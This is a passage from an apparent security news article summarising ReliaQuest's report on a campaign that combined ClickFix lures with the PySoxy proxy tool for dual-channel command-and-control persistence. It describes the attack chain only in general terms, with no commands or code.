As the researchers pointed out in a blog post, PySoxy is giving attackers encrypted proxy access without relying on well-known malware or remote monitoring and management (RMM) tools. The observed attack chain established an initial PowerShell-based C2 channel, followed by a second C2 path through PySoxy.
The campaign was observed in April. ReliaQuest said this was the first time it had seen ClickFix combined with PySoxy in active intrusions.
PySoxy used for dual-channel persistence
The attack started with a ClickFix lure that tricked the victim into manually pasting and executing a malicious command disguised as a fix to a technical issue. Once launched, the command initiated a multi-stage infection chain.
According to ReliaQuest, the execution flow established persistence through scheduled tasks, carried out domain reconnaissance, and opened an initial PowerShell-based C2 channel back to the attackers. The chain then deployed PyProxy to create a second encrypted communication path that turns the infected endpoint into a proxy relay.
